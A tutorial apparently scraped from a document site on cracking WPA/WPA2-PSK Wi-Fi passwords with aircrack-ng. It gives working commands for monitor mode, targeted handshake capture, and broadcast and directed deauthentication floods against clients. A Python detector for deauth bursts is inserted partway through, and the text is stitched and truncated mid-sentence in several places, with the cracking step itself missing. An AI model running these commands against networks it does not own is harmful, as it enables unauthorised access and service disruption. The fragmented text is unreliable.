Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng

  • 8/12/2019 Crack Wi-Fi With WPA_WPA2-PSK Using Aircrack-ng

    Crack Wi-Fi with WPA/WPA2-PSK using Aircrack-ng

    This article is a summary of effective commands that just work.

    With the help of these commands you will be able to crack WPA/WPA2 Wi-Fi access points which use PSK (Pre-Shared Key) encryption.

    The objective is to capture the WPA/WPA2 authentication handshake and then crack the PSK using aircrack-ng.

    The full tutorial about WPA/WPA2 cracking can be found here.

    Here are the basic steps we will be going through:

    0. Install the latest aircrack-ng
    1. Start the wireless interface in monitor mode using airmon-ng
    2. Start airodump-ng on AP channel with filter for BSSID to collect authentication handshake
    3. [Optional] Use aireplay-ng to deauthenticate the wireless client
    4. Run aircrack-ng to crack the WPA/WPA2-PSK using the authentication handshake

    0. Install the Latest Aircrack-ng

    Install the required dependencies:

    $ sudo apt-get install build-essential libssl-dev pkg-config

    Download and install the latest aircrack-ng:

    $ wget http://download.aircrack-ng.org/aircrack-ng-1.2-beta3.tar.gz

    $ tar -zxvf aircrack-ng-1.2-beta3.tar.gz

    $ cd aircrack-ng-1.2-beta3

    $ sudo make

    $ sudo make install

    Be sure to check that the version of aircrack-ng is up-to-date because you may see problems with older versions.

    $ aircrack-ng --help | head -3

    Aircrack-ng 1.2 beta3 r2393 - (C) 2006-2013 Thomas d'Otreppe
    http://www.aircrack-ng.org

    http://www.aircrack-ng.org/doku.php?id=cracking_wpa
    http://www.aircrack-ng.org/doku.php?id=install_aircrack
    1. Start the Wireless Interface in Monitor Mode

    Find and stop all processes that could cause trouble:

    $ sudo airmon-ng check kill

    Start the wireless interface in monitor mode:

    $ sudo airmon-ng start wlan0

    Notice that airmon-ng enabled monitor-mode on mon0:

    Interface    Chipset       Driver

    wlan0        Intel 6235    iwlwifi - [phy0]

                 (monitor mode enabled on mon0)

    So, the correct interface name to use in later parts of the tutorial is mon0.

    2. Start Airodump-ng to Collect Authentication Handshake

    Now, when our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air.

    It can be done with airodump-ng command:

    $ sudo airodump-ng mon0

    All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen:

    [airodump-ng screen output: access points 00:11:22:33:44:55 (WPA2, CCMP, PSK, ESSID CrackMe) and 66:77:88:99:00:11 (WPA2, CCMP, PSK, ESSID SomeAP) in the upper part; associated stations, including AA:BB:CC:DD:EE:FF on 00:11:22:33:44:55, in the lower part]

    Now start airodump-ng on AP channel with filter for BSSID to collect authentication handshake for the access point we are interested in:

    $ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one

    Option                   Description

    -c                       The channel for the wireless network

    --bssid                  The MAC address of the access point

    -w                       The file name prefix for the file which will contain authentication handshake

    mon0                     The wireless interface

    --ignore-negative-one    Removes 'fi

    if you want to force this process.

    After some time you'll notice the WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen.

    This means airodump-ng has successfully captured the handshake.

    [airodump-ng screen output: "WPA handshake: 00:11:22:33:44:55" at the end of the top line, above the entry for access point 00:11:22:33:44:55 (WPA2, CCMP, PSK, ESSID CrackMe) and its station AA:BB:CC:DD:EE:FF]

    3. [Optional] Use Aireplay-ng to Deauthenticate the Wireless Client

    This step is optional. If you can't wait till airodump-ng captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP and we'll capture the authentication handshake.

    Send DeAuth to broadcast:

    $ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

    Send directed DeAuth (attack is more effective when it is targeted):

    $ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one

    Option                   Description

    --deauth 100             The number of de-authenticate frames you want to send (0 for unlimited)

    -a                       The MAC address of the access point

    -c                       The MAC address of the client

    mon0                     The wireless interface

    --ignore-negative-one    Removes 'fi
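
Seen from the network owner's side, the deauthentication step above shows up as a burst of deauth frames against one BSSID. The following is an added example, not part of the original article: it flags such bursts in a list of captured management-frame records. The record layout, the sample frames, the one-second window and the threshold of 10 are constructed assumptions.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "00:11:22:33:44:55"        # example BSSID used in the article
CLIENT = "aa:bb:cc:dd:ee:ff"    # example client MAC used in the article

def detect_deauth_bursts(frames, window=1.0, threshold=10):
    """Flag (bssid, destination) pairs that see more than `threshold`
    deauthentication frames within `window` seconds.

    frames: iterable of (timestamp_s, subtype, bssid, destination) tuples,
    a hypothetical record layout; window and threshold are assumed values.
    """
    recent = defaultdict(deque)   # (bssid, dst) -> timestamps still in window
    alerts = {}                   # one alert per pair, insertion-ordered
    for ts, subtype, bssid, dst in sorted(frames):
        if subtype != "deauth":
            continue
        key = (bssid.lower(), dst.lower())
        stamps = recent[key]
        stamps.append(ts)
        while ts - stamps[0] > window:      # drop frames older than the window
            stamps.popleft()
        if len(stamps) > threshold:
            alert = alerts.setdefault(key, {
                "bssid": key[0],
                "target": key[1],
                "kind": "broadcast" if key[1] == BROADCAST else "directed",
                "first_seen": stamps[0],
                "peak": 0,
            })
            alert["peak"] = max(alert["peak"], len(stamps))
    return list(alerts.values())

def sample_frames():
    """Constructed capture: normal traffic plus two 100-frame deauth bursts."""
    frames = [(0.5, "deauth", AP, "11:22:33:44:55:66"),   # ordinary disconnect
              (1.0, "beacon", AP, BROADCAST)]
    frames += [(10.0 + i * 0.005, "deauth", AP, CLIENT) for i in range(100)]
    frames += [(20.0 + i * 0.005, "deauth", AP, BROADCAST) for i in range(100)]
    return frames

if __name__ == "__main__":
    for alert in detect_deauth_bursts(sample_frames()):
        print(alert)
```

Detection of this kind complements 802.11w Protected Management Frames, under which stations discard deauthentication frames that are not authenticated.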

    [aircrack-ng output: Transient Key and EAPOL HMAC values]

    http://www.insidepro.com/dictionaries.php